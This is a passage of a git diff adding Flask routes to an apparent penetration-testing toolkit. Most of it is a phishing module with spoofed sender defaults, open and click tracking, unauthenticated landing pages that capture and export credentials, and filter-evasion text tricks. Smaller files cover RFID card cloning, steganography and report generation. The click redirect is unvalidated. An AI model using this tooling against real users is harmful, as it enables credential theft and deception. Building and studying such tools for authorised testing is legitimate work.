|
||||
|
||||
# ── Page ─────────────────────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('phishmail.html')
|
||||
|
||||
|
||||
# ── Send ─────────────────────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/send', methods=['POST'])
|
||||
@login_required
|
||||
def send():
|
||||
"""Send a single email."""
|
||||
data = request.get_json(silent=True) or {}
|
||||
if not data.get('to_addrs'):
|
||||
return jsonify({'ok': False, 'error': 'Recipients required'})
|
||||
if not data.get('from_addr'):
|
||||
return jsonify({'ok': False, 'error': 'Sender address required'})
|
||||
|
||||
to_addrs = data.get('to_addrs', '')
|
||||
if isinstance(to_addrs, str):
|
||||
to_addrs = [a.strip() for a in to_addrs.split(',') if a.strip()]
|
||||
|
||||
config = {
|
||||
'from_addr': data.get('from_addr', ''),
|
||||
'from_name': data.get('from_name', ''),
|
||||
'to_addrs': to_addrs,
|
||||
'subject': data.get('subject', ''),
|
||||
'html_body': data.get('html_body', ''),
|
||||
'text_body': data.get('text_body', ''),
|
||||
'smtp_host': data.get('smtp_host', '127.0.0.1'),
|
||||
'smtp_port': int(data.get('smtp_port', 25)),
|
||||
'use_tls': data.get('use_tls', False),
|
||||
'cert_cn': data.get('cert_cn', ''),
|
||||
'reply_to': data.get('reply_to', ''),
|
||||
'x_mailer': data.get('x_mailer', 'Microsoft Outlook 16.0'),
|
||||
}
|
||||
|
||||
result = _server().send_email(config)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@phishmail_bp.route('/validate', methods=['POST'])
|
||||
@login_required
|
||||
def validate():
|
||||
"""Validate that a recipient is on the local network."""
|
||||
data = request.get_json(silent=True) or {}
|
||||
address = data.get('address', '')
|
||||
if not address:
|
||||
return jsonify({'ok': False, 'error': 'Address required'})
|
||||
|
||||
from modules.phishmail import _validate_local_only
|
||||
ok, msg = _validate_local_only(address)
|
||||
return jsonify({'ok': ok, 'message': msg})
|
||||
|
||||
|
||||
# ── Campaigns ────────────────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/campaigns', methods=['GET'])
|
||||
@login_required
|
||||
def list_campaigns():
|
||||
server = _server()
|
||||
campaigns = server.campaigns.list_campaigns()
|
||||
for c in campaigns:
|
||||
c['stats'] = server.campaigns.get_stats(c['id'])
|
||||
return jsonify({'ok': True, 'campaigns': campaigns})
|
||||
|
||||
|
||||
@phishmail_bp.route('/campaigns', methods=['POST'])
|
||||
@login_required
|
||||
def create_campaign():
|
||||
data = request.get_json(silent=True) or {}
|
||||
name = data.get('name', '').strip()
|
||||
if not name:
|
||||
return jsonify({'ok': False, 'error': 'Campaign name required'})
|
||||
|
||||
template = data.get('template', '')
|
||||
targets = data.get('targets', [])
|
||||
if isinstance(targets, str):
|
||||
targets = [t.strip() for t in targets.split('\n') if t.strip()]
|
||||
|
||||
cid = _server().campaigns.create_campaign(
|
||||
name=name,
|
||||
template=template,
|
||||
targets=targets,
|
||||
from_addr=data.get('from_addr', 'it@company.local'),
|
||||
from_name=data.get('from_name', 'IT Department'),
|
||||
subject=data.get('subject', ''),
|
||||
smtp_host=data.get('smtp_host', '127.0.0.1'),
|
||||
smtp_port=int(data.get('smtp_port', 25)),
|
||||
)
|
||||
return jsonify({'ok': True, 'id': cid})
|
||||
|
||||
|
||||
@phishmail_bp.route('/campaigns/<cid>', methods=['GET'])
|
||||
@login_required
|
||||
def get_campaign(cid):
|
||||
server = _server()
|
||||
camp = server.campaigns.get_campaign(cid)
|
||||
if not camp:
|
||||
return jsonify({'ok': False, 'error': 'Campaign not found'})
|
||||
camp['stats'] = server.campaigns.get_stats(cid)
|
||||
return jsonify({'ok': True, 'campaign': camp})
|
||||
|
||||
|
||||
@phishmail_bp.route('/campaigns/<cid>/send', methods=['POST'])
|
||||
@login_required
|
||||
def send_campaign(cid):
|
||||
data = request.get_json(silent=True) or {}
|
||||
base_url = data.get('base_url', request.host_url.rstrip('/'))
|
||||
result = _server().send_campaign(cid, base_url=base_url)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@phishmail_bp.route('/campaigns/<cid>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_campaign(cid):
|
||||
if _server().campaigns.delete_campaign(cid):
|
||||
return jsonify({'ok': True})
|
||||
return jsonify({'ok': False, 'error': 'Campaign not found'})
|
||||
|
||||
|
||||
# ── Templates ────────────────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/templates', methods=['GET'])
|
||||
@login_required
|
||||
def list_templates():
|
||||
templates = _server().templates.list_templates()
|
||||
return jsonify({'ok': True, 'templates': templates})
|
||||
|
||||
|
||||
@phishmail_bp.route('/templates', methods=['POST'])
|
||||
@login_required
|
||||
def save_template():
|
||||
data = request.get_json(silent=True) or {}
|
||||
name = data.get('name', '').strip()
|
||||
if not name:
|
||||
return jsonify({'ok': False, 'error': 'Template name required'})
|
||||
_server().templates.save_template(
|
||||
name, data.get('html', ''), data.get('text', ''),
|
||||
data.get('subject', ''))
|
||||
return jsonify({'ok': True})
|
||||
|
||||
|
||||
@phishmail_bp.route('/templates/<name>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_template(name):
|
||||
if _server().templates.delete_template(name):
|
||||
return jsonify({'ok': True})
|
||||
return jsonify({'ok': False, 'error': 'Template not found or is built-in'})
|
||||
|
||||
|
||||
# ── SMTP Relay ───────────────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/server/start', methods=['POST'])
|
||||
@login_required
|
||||
def server_start():
|
||||
data = request.get_json(silent=True) or {}
|
||||
host = data.get('host', '0.0.0.0')
|
||||
port = int(data.get('port', 2525))
|
||||
result = _server().start_relay(host, port)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@phishmail_bp.route('/server/stop', methods=['POST'])
|
||||
@login_required
|
||||
def server_stop():
|
||||
result = _server().stop_relay()
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@phishmail_bp.route('/server/status', methods=['GET'])
|
||||
@login_required
|
||||
def server_status():
|
||||
return jsonify(_server().relay_status())
|
||||
|
||||
|
||||
# ── Certificate Generation ───────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/cert/generate', methods=['POST'])
|
||||
@login_required
|
||||
def cert_generate():
|
||||
data = request.get_json(silent=True) or {}
|
||||
result = _server().generate_cert(
|
||||
cn=data.get('cn', 'mail.example.com'),
|
||||
org=data.get('org', 'Example Inc'),
|
||||
ou=data.get('ou', ''),
|
||||
locality=data.get('locality', ''),
|
||||
state=data.get('state', ''),
|
||||
country=data.get('country', 'US'),
|
||||
days=int(data.get('days', 365)),
|
||||
)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@phishmail_bp.route('/cert/list', methods=['GET'])
|
||||
@login_required
|
||||
def cert_list():
|
||||
return jsonify({'ok': True, 'certs': _server().list_certs()})
|
||||
|
||||
|
||||
# ── SMTP Connection Test ────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/test', methods=['POST'])
|
||||
@login_required
|
||||
def test_smtp():
|
||||
data = request.get_json(silent=True) or {}
|
||||
host = data.get('host', '')
|
||||
port = int(data.get('port', 25))
|
||||
if not host:
|
||||
return jsonify({'ok': False, 'error': 'Host required'})
|
||||
result = _server().test_smtp(host, port)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
# ── Tracking (no auth — accessed by email clients) ──────────────────────────
|
||||
|
||||
# 1x1 transparent GIF
|
||||
_PIXEL_GIF = base64.b64decode(
|
||||
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
|
||||
|
||||
|
||||
@phishmail_bp.route('/track/pixel/<campaign>/<target>')
|
||||
def track_pixel(campaign, target):
|
||||
"""Tracking pixel — records email open."""
|
||||
try:
|
||||
_server().campaigns.record_open(campaign, target)
|
||||
except Exception:
|
||||
pass
|
||||
return Response(_PIXEL_GIF, mimetype='image/gif',
|
||||
headers={'Cache-Control': 'no-store, no-cache'})
|
||||
|
||||
|
||||
@phishmail_bp.route('/track/click/<campaign>/<target>/<link_data>')
|
||||
def track_click(campaign, target, link_data):
|
||||
"""Click tracking — records click and redirects."""
|
||||
try:
|
||||
_server().campaigns.record_click(campaign, target)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Decode original URL
|
||||
try:
|
||||
original_url = base64.urlsafe_b64decode(link_data).decode()
|
||||
except Exception:
|
||||
original_url = '/'
|
||||
|
||||
return redirect(original_url)
|
||||
|
||||
|
||||
# ── Landing Pages / Credential Harvesting ─────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/landing-pages', methods=['GET'])
|
||||
@login_required
|
||||
def list_landing_pages():
|
||||
return jsonify({'ok': True, 'pages': _server().landing_pages.list_pages()})
|
||||
|
||||
|
||||
@phishmail_bp.route('/landing-pages', methods=['POST'])
|
||||
@login_required
|
||||
def create_landing_page():
|
||||
data = request.get_json(silent=True) or {}
|
||||
name = data.get('name', '').strip()
|
||||
html = data.get('html', '')
|
||||
if not name:
|
||||
return jsonify({'ok': False, 'error': 'Name required'})
|
||||
pid = _server().landing_pages.create_page(
|
||||
name, html,
|
||||
redirect_url=data.get('redirect_url', ''),
|
||||
fields=data.get('fields', ['username', 'password']))
|
||||
return jsonify({'ok': True, 'id': pid})
|
||||
|
||||
|
||||
@phishmail_bp.route('/landing-pages/<pid>', methods=['GET'])
|
||||
@login_required
|
||||
def get_landing_page(pid):
|
||||
page = _server().landing_pages.get_page(pid)
|
||||
if not page:
|
||||
return jsonify({'ok': False, 'error': 'Page not found'})
|
||||
return jsonify({'ok': True, 'page': page})
|
||||
|
||||
|
||||
@phishmail_bp.route('/landing-pages/<pid>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_landing_page(pid):
|
||||
if _server().landing_pages.delete_page(pid):
|
||||
return jsonify({'ok': True})
|
||||
return jsonify({'ok': False, 'error': 'Page not found or is built-in'})
|
||||
|
||||
|
||||
@phishmail_bp.route('/landing-pages/<pid>/preview')
|
||||
@login_required
|
||||
def preview_landing_page(pid):
|
||||
html = _server().landing_pages.render_page(pid, 'preview', 'preview', 'user@example.com')
|
||||
if not html:
|
||||
return 'Page not found', 404
|
||||
return html
|
||||
|
||||
|
||||
# Landing page capture endpoints (NO AUTH — accessed by phish targets)
|
||||
@phishmail_bp.route('/lp/<page_id>', methods=['GET', 'POST'])
|
||||
def landing_page_serve(page_id):
|
||||
"""Serve a landing page and capture credentials on POST."""
|
||||
server = _server()
|
||||
if request.method == 'GET':
|
||||
campaign = request.args.get('c', '')
|
||||
target = request.args.get('t', '')
|
||||
email = request.args.get('e', '')
|
||||
html = server.landing_pages.render_page(page_id, campaign, target, email)
|
||||
if not html:
|
||||
return 'Not found', 404
|
||||
return html
|
||||
|
||||
# POST — capture credentials
|
||||
form_data = dict(request.form)
|
||||
req_info = {
|
||||
'ip': request.remote_addr,
|
||||
'user_agent': request.headers.get('User-Agent', ''),
|
||||
'referer': request.headers.get('Referer', ''),
|
||||
}
|
||||
capture = server.landing_pages.record_capture(page_id, form_data, req_info)
|
||||
|
||||
# Also update campaign tracking if campaign/target provided
|
||||
campaign = form_data.get('_campaign', '')
|
||||
target = form_data.get('_target', '')
|
||||
if campaign and target:
|
||||
try:
|
||||
server.campaigns.record_click(campaign, target)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Redirect to configured URL or generic "success" page
|
||||
page = server.landing_pages.get_page(page_id)
|
||||
redirect_url = (page or {}).get('redirect_url', '')
|
||||
if redirect_url:
|
||||
return redirect(redirect_url)
|
||||
return """<!DOCTYPE html><html><head><title>Success</title>
|
||||
<style>body{font-family:sans-serif;display:flex;justify-content:center;align-items:center;min-height:100vh;background:#f5f5f5}
|
||||
.card{background:#fff;padding:40px;border-radius:8px;text-align:center;box-shadow:0 2px 8px rgba(0,0,0,0.1)}
|
||||
</style></head><body><div class="card"><h2>Authentication Successful</h2>
|
||||
<p>You will be redirected shortly...</p></div></body></html>"""
|
||||
|
||||
|
||||
@phishmail_bp.route('/captures', methods=['GET'])
|
||||
@login_required
|
||||
def list_captures():
|
||||
campaign = request.args.get('campaign', '')
|
||||
page = request.args.get('page', '')
|
||||
captures = _server().landing_pages.get_captures(campaign, page)
|
||||
return jsonify({'ok': True, 'captures': captures})
|
||||
|
||||
|
||||
@phishmail_bp.route('/captures', methods=['DELETE'])
|
||||
@login_required
|
||||
def clear_captures():
|
||||
campaign = request.args.get('campaign', '')
|
||||
count = _server().landing_pages.clear_captures(campaign)
|
||||
return jsonify({'ok': True, 'cleared': count})
|
||||
|
||||
|
||||
@phishmail_bp.route('/captures/export')
|
||||
@login_required
|
||||
def export_captures():
|
||||
campaign = request.args.get('campaign', '')
|
||||
captures = _server().landing_pages.get_captures(campaign)
|
||||
# CSV export
|
||||
import io, csv
|
||||
output = io.StringIO()
|
||||
writer = csv.writer(output)
|
||||
writer.writerow(['timestamp', 'campaign', 'target', 'ip', 'user_agent', 'credentials'])
|
||||
for c in captures:
|
||||
creds_str = '; '.join(f"{k}={v}" for k, v in c.get('credentials', {}).items())
|
||||
writer.writerow([c.get('timestamp', ''), c.get('campaign', ''),
|
||||
c.get('target', ''), c.get('ip', ''),
|
||||
c.get('user_agent', ''), creds_str])
|
||||
return Response(output.getvalue(), mimetype='text/csv',
|
||||
headers={'Content-Disposition': f'attachment;filename=captures_{campaign or "all"}.csv'})
|
||||
|
||||
|
||||
# ── Campaign enhancements ─────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/campaigns/<cid>/export')
|
||||
@login_required
|
||||
def export_campaign(cid):
|
||||
"""Export campaign results as CSV."""
|
||||
import io, csv
|
||||
camp = _server().campaigns.get_campaign(cid)
|
||||
if not camp:
|
||||
return jsonify({'ok': False, 'error': 'Campaign not found'})
|
||||
output = io.StringIO()
|
||||
writer = csv.writer(output)
|
||||
writer.writerow(['email', 'target_id', 'status', 'sent_at', 'opened_at', 'clicked_at'])
|
||||
for t in camp.get('targets', []):
|
||||
writer.writerow([t['email'], t['id'], t.get('status', ''),
|
||||
t.get('sent_at', ''), t.get('opened_at', ''),
|
||||
t.get('clicked_at', '')])
|
||||
return Response(output.getvalue(), mimetype='text/csv',
|
||||
headers={'Content-Disposition': f'attachment;filename=campaign_{cid}.csv'})
|
||||
|
||||
|
||||
@phishmail_bp.route('/campaigns/import-targets', methods=['POST'])
|
||||
@login_required
|
||||
def import_targets_csv():
|
||||
"""Import targets from CSV (email per line, or CSV with email column)."""
|
||||
data = request.get_json(silent=True) or {}
|
||||
csv_text = data.get('csv', '')
|
||||
if not csv_text:
|
||||
return jsonify({'ok': False, 'error': 'CSV data required'})
|
||||
|
||||
import io, csv
|
||||
reader = csv.reader(io.StringIO(csv_text))
|
||||
emails = []
|
||||
for row in reader:
|
||||
if not row:
|
||||
continue
|
||||
# Try to find email in each column
|
||||
for cell in row:
|
||||
cell = cell.strip()
|
||||
if '@' in cell and '.' in cell:
|
||||
emails.append(cell)
|
||||
break
|
||||
else:
|
||||
# If no email found, treat first column as raw email
|
||||
val = row[0].strip()
|
||||
if val and not val.startswith('#'):
|
||||
emails.append(val)
|
||||
|
||||
# Deduplicate
|
||||
seen = set()
|
||||
unique = []
|
||||
for e in emails:
|
||||
if e.lower() not in seen:
|
||||
seen.add(e.lower())
|
||||
unique.append(e)
|
||||
|
||||
return jsonify({'ok': True, 'emails': unique, 'count': len(unique)})
|
||||
|
||||
|
||||
# ── DKIM ──────────────────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/dkim/generate', methods=['POST'])
|
||||
@login_required
|
||||
def dkim_generate():
|
||||
data = request.get_json(silent=True) or {}
|
||||
domain = data.get('domain', '').strip()
|
||||
if not domain:
|
||||
return jsonify({'ok': False, 'error': 'Domain required'})
|
||||
return jsonify(_server().dkim.generate_keypair(domain))
|
||||
|
||||
|
||||
@phishmail_bp.route('/dkim/keys', methods=['GET'])
|
||||
@login_required
|
||||
def dkim_list():
|
||||
return jsonify({'ok': True, 'keys': _server().dkim.list_keys()})
|
||||
|
||||
|
||||
# ── DNS Auto-Setup ────────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/dns-setup', methods=['POST'])
|
||||
@login_required
|
||||
def dns_setup():
|
||||
data = request.get_json(silent=True) or {}
|
||||
domain = data.get('domain', '').strip()
|
||||
if not domain:
|
||||
return jsonify({'ok': False, 'error': 'Domain required'})
|
||||
return jsonify(_server().setup_dns_for_domain(
|
||||
domain,
|
||||
mail_host=data.get('mail_host', ''),
|
||||
spf_allow=data.get('spf_allow', '')))
|
||||
|
||||
|
||||
@phishmail_bp.route('/dns-status', methods=['GET'])
|
||||
@login_required
|
||||
def dns_check():
|
||||
return jsonify(_server().dns_status())
|
||||
|
||||
|
||||
# ── Evasion Preview ──────────────────────────────────────────────────────
|
||||
|
||||
@phishmail_bp.route('/evasion/preview', methods=['POST'])
|
||||
@login_required
|
||||
def evasion_preview():
|
||||
data = request.get_json(silent=True) or {}
|
||||
text = data.get('text', '')
|
||||
mode = data.get('mode', 'homoglyph')
|
||||
from modules.phishmail import EmailEvasion
|
||||
ev = EmailEvasion()
|
||||
if mode == 'homoglyph':
|
||||
result = ev.homoglyph_text(text)
|
||||
elif mode == 'zero_width':
|
||||
result = ev.zero_width_insert(text)
|
||||
elif mode == 'html_entity':
|
||||
result = ev.html_entity_encode(text)
|
||||
elif mode == 'random_headers':
|
||||
result = ev.randomize_headers()
|
||||
return jsonify({'ok': True, 'headers': result})
|
||||
else:
|
||||
result = text
|
||||
return jsonify({'ok': True, 'result': result})
|
||||
108
web/routes/report_engine.py
Normal file
108
web/routes/report_engine.py
Normal file
@ -0,0 +1,108 @@
|
||||
"""Reporting Engine — web routes for pentest report management."""
|
||||
|
||||
from flask import Blueprint, render_template, request, jsonify, Response
|
||||
from web.auth import login_required
|
||||
|
||||
report_engine_bp = Blueprint('report_engine', __name__)
|
||||
|
||||
|
||||
def _svc():
|
||||
from modules.report_engine import get_report_engine
|
||||
return get_report_engine()
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('report_engine.html')
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_reports():
|
||||
return jsonify({'ok': True, 'reports': _svc().list_reports()})
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/create', methods=['POST'])
|
||||
@login_required
|
||||
def create_report():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_svc().create_report(
|
||||
title=data.get('title', 'Untitled Report'),
|
||||
client=data.get('client', ''),
|
||||
scope=data.get('scope', ''),
|
||||
methodology=data.get('methodology', ''),
|
||||
))
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/<report_id>', methods=['GET'])
|
||||
@login_required
|
||||
def get_report(report_id):
|
||||
r = _svc().get_report(report_id)
|
||||
if not r:
|
||||
return jsonify({'ok': False, 'error': 'Report not found'})
|
||||
return jsonify({'ok': True, 'report': r})
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/<report_id>', methods=['PUT'])
|
||||
@login_required
|
||||
def update_report(report_id):
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_svc().update_report(report_id, data))
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/<report_id>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_report(report_id):
|
||||
return jsonify(_svc().delete_report(report_id))
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/<report_id>/findings', methods=['POST'])
|
||||
@login_required
|
||||
def add_finding(report_id):
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_svc().add_finding(report_id, data))
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/<report_id>/findings/<finding_id>', methods=['PUT'])
|
||||
@login_required
|
||||
def update_finding(report_id, finding_id):
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_svc().update_finding(report_id, finding_id, data))
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/<report_id>/findings/<finding_id>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_finding(report_id, finding_id):
|
||||
return jsonify(_svc().delete_finding(report_id, finding_id))
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/templates', methods=['GET'])
|
||||
@login_required
|
||||
def finding_templates():
|
||||
return jsonify({'ok': True, 'templates': _svc().get_finding_templates()})
|
||||
|
||||
|
||||
@report_engine_bp.route('/reports/<report_id>/export/<fmt>', methods=['GET'])
|
||||
@login_required
|
||||
def export_report(report_id, fmt):
|
||||
svc = _svc()
|
||||
if fmt == 'html':
|
||||
content = svc.export_html(report_id)
|
||||
if not content:
|
||||
return jsonify({'ok': False, 'error': 'Report not found'})
|
||||
return Response(content, mimetype='text/html',
|
||||
headers={'Content-Disposition': f'attachment; filename=report_{report_id}.html'})
|
||||
elif fmt == 'markdown':
|
||||
content = svc.export_markdown(report_id)
|
||||
if not content:
|
||||
return jsonify({'ok': False, 'error': 'Report not found'})
|
||||
return Response(content, mimetype='text/markdown',
|
||||
headers={'Content-Disposition': f'attachment; filename=report_{report_id}.md'})
|
||||
elif fmt == 'json':
|
||||
content = svc.export_json(report_id)
|
||||
if not content:
|
||||
return jsonify({'ok': False, 'error': 'Report not found'})
|
||||
return Response(content, mimetype='application/json',
|
||||
headers={'Content-Disposition': f'attachment; filename=report_{report_id}.json'})
|
||||
return jsonify({'ok': False, 'error': 'Invalid format'})
|
||||
90
web/routes/rfid_tools.py
Normal file
90
web/routes/rfid_tools.py
Normal file
@ -0,0 +1,90 @@
|
||||
"""RFID/NFC Tools routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
rfid_tools_bp = Blueprint('rfid_tools', __name__, url_prefix='/rfid')
|
||||
|
||||
def _get_mgr():
|
||||
from modules.rfid_tools import get_rfid_manager
|
||||
return get_rfid_manager()
|
||||
|
||||
@rfid_tools_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('rfid_tools.html')
|
||||
|
||||
@rfid_tools_bp.route('/tools')
|
||||
@login_required
|
||||
def tools_status():
|
||||
return jsonify(_get_mgr().get_tools_status())
|
||||
|
||||
@rfid_tools_bp.route('/lf/search', methods=['POST'])
|
||||
@login_required
|
||||
def lf_search():
|
||||
return jsonify(_get_mgr().lf_search())
|
||||
|
||||
@rfid_tools_bp.route('/lf/read/em410x', methods=['POST'])
|
||||
@login_required
|
||||
def lf_read_em():
|
||||
return jsonify(_get_mgr().lf_read_em410x())
|
||||
|
||||
@rfid_tools_bp.route('/lf/clone', methods=['POST'])
|
||||
@login_required
|
||||
def lf_clone():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().lf_clone_em410x(data.get('card_id', '')))
|
||||
|
||||
@rfid_tools_bp.route('/lf/sim', methods=['POST'])
|
||||
@login_required
|
||||
def lf_sim():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().lf_sim_em410x(data.get('card_id', '')))
|
||||
|
||||
@rfid_tools_bp.route('/hf/search', methods=['POST'])
|
||||
@login_required
|
||||
def hf_search():
|
||||
return jsonify(_get_mgr().hf_search())
|
||||
|
||||
@rfid_tools_bp.route('/hf/dump', methods=['POST'])
|
||||
@login_required
|
||||
def hf_dump():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().hf_dump_mifare(data.get('keys_file')))
|
||||
|
||||
@rfid_tools_bp.route('/hf/clone', methods=['POST'])
|
||||
@login_required
|
||||
def hf_clone():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().hf_clone_mifare(data.get('dump_file', '')))
|
||||
|
||||
@rfid_tools_bp.route('/nfc/scan', methods=['POST'])
|
||||
@login_required
|
||||
def nfc_scan():
|
||||
return jsonify(_get_mgr().nfc_scan())
|
||||
|
||||
@rfid_tools_bp.route('/cards', methods=['GET', 'POST', 'DELETE'])
|
||||
@login_required
|
||||
def cards():
|
||||
mgr = _get_mgr()
|
||||
if request.method == 'POST':
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(mgr.save_card(data.get('card', {}), data.get('name')))
|
||||
elif request.method == 'DELETE':
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(mgr.delete_card(data.get('index', -1)))
|
||||
return jsonify(mgr.get_saved_cards())
|
||||
|
||||
@rfid_tools_bp.route('/dumps')
|
||||
@login_required
|
||||
def dumps():
|
||||
return jsonify(_get_mgr().list_dumps())
|
||||
|
||||
@rfid_tools_bp.route('/keys')
|
||||
@login_required
|
||||
def default_keys():
|
||||
return jsonify(_get_mgr().get_default_keys())
|
||||
|
||||
@rfid_tools_bp.route('/types')
|
||||
@login_required
|
||||
def card_types():
|
||||
return jsonify(_get_mgr().get_card_types())
|
||||
96
web/routes/steganography.py
Normal file
96
web/routes/steganography.py
Normal file
@ -0,0 +1,96 @@
|
||||
"""Steganography routes."""
|
||||
import os
|
||||
import base64
|
||||
from flask import Blueprint, request, jsonify, render_template, current_app
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
steganography_bp = Blueprint('steganography', __name__, url_prefix='/stego')
|
||||
|
||||
def _get_mgr():
|
||||
from modules.steganography import get_stego_manager
|
||||
return get_stego_manager()
|
||||
|
||||
@steganography_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('steganography.html')
|
||||
|
||||
@steganography_bp.route('/capabilities')
|
||||
@login_required
|
||||
def capabilities():
|
||||
return jsonify(_get_mgr().get_capabilities())
|
||||
|
||||
@steganography_bp.route('/capacity', methods=['POST'])
|
||||
@login_required
|
||||
def capacity():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().capacity(data.get('file', '')))
|
||||
|
||||
@steganography_bp.route('/hide', methods=['POST'])
|
||||
@login_required
|
||||
def hide():
|
||||
mgr = _get_mgr()
|
||||
# Support file upload or path-based
|
||||
if request.content_type and 'multipart' in request.content_type:
|
||||
carrier = request.files.get('carrier')
|
||||
if not carrier:
|
||||
return jsonify({'ok': False, 'error': 'No carrier file'})
|
||||
upload_dir = current_app.config.get('UPLOAD_FOLDER', '/tmp')
|
||||
carrier_path = os.path.join(upload_dir, carrier.filename)
|
||||
carrier.save(carrier_path)
|
||||
message = request.form.get('message', '')
|
||||
password = request.form.get('password') or None
|
||||
output_path = os.path.join(upload_dir, f'stego_{carrier.filename}')
|
||||
result = mgr.hide(carrier_path, message.encode(), output_path, password)
|
||||
else:
|
||||
data = request.get_json(silent=True) or {}
|
||||
carrier_path = data.get('carrier', '')
|
||||
message = data.get('message', '')
|
||||
password = data.get('password') or None
|
||||
output = data.get('output')
|
||||
result = mgr.hide(carrier_path, message.encode(), output, password)
|
||||
return jsonify(result)
|
||||
|
||||
@steganography_bp.route('/extract', methods=['POST'])
|
||||
@login_required
|
||||
def extract():
|
||||
data = request.get_json(silent=True) or {}
|
||||
result = _get_mgr().extract(data.get('file', ''), data.get('password'))
|
||||
if result.get('ok') and 'data' in result:
|
||||
try:
|
||||
result['text'] = result['data'].decode('utf-8')
|
||||
except (UnicodeDecodeError, AttributeError):
|
||||
result['base64'] = base64.b64encode(result['data']).decode()
|
||||
del result['data'] # Don't send raw bytes in JSON
|
||||
return jsonify(result)
|
||||
|
||||
@steganography_bp.route('/detect', methods=['POST'])
|
||||
@login_required
|
||||
def detect():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().detect(data.get('file', '')))
|
||||
|
||||
@steganography_bp.route('/whitespace/hide', methods=['POST'])
|
||||
@login_required
|
||||
def whitespace_hide():
|
||||
data = request.get_json(silent=True) or {}
|
||||
from modules.steganography import DocumentStego
|
||||
result = DocumentStego.hide_whitespace(
|
||||
data.get('text', ''), data.get('message', '').encode(),
|
||||
data.get('password')
|
||||
)
|
||||
return jsonify(result)
|
||||
|
||||
@steganography_bp.route('/whitespace/extract', methods=['POST'])
|
||||
@login_required
|
||||
def whitespace_extract():
|
||||
data = request.get_json(silent=True) or {}
|
||||
from modules.steganography import DocumentStego
|
||||
result = DocumentStego.extract_whitespace(data.get('text', ''), data.get('password'))
|
||||
if result.get('ok') and 'data' in result:
|
||||
try:
|
||||
result['text'] = result['data'].decode('utf-8')
|
||||
except (UnicodeDecodeError, AttributeError):
|
||||
result['base64'] = base64.b64encode(result['data']).decode()
|
||||
del result['data']
|
||||
return jsonify(result)
|
||||
125
web/routes/threat_intel.py
Normal file
125
web/routes/threat_intel.py
Normal file
@ -0,0 +1,125 @@
|
||||
"""Threat Intelligence routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template, Response
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
threat_intel_bp = Blueprint('threat_intel', __name__, url_prefix='/threat-intel')
|
||||
|
||||
def _get_engine():
|
||||
from modules.threat_intel import get_threat_intel
|
||||
return get_threat_intel()
|
||||
|
||||
@threat_intel_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('threat_intel.html')
|
||||
|
||||
@threat_intel_bp.route('/iocs', methods=['GET', 'POST', 'DELETE'])
|
||||
@login_required
|
||||
def iocs():
|
||||
engine = _get_engine()
|
||||
if request.method == 'POST':
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(engine.add_ioc(
|
||||
value=data.get('value', ''),
|
||||
ioc_type=data.get('ioc_type'),
|
||||
source=data.get('source', 'manual'),
|
||||
tags=data.get('tags', []),
|
||||
severity=data.get('severity', 'unknown'),
|
||||
description=data.get('description', ''),
|
||||
reference=data.get('reference', '')
|
||||
))
|
||||
elif request.method == 'DELETE':
|
||||
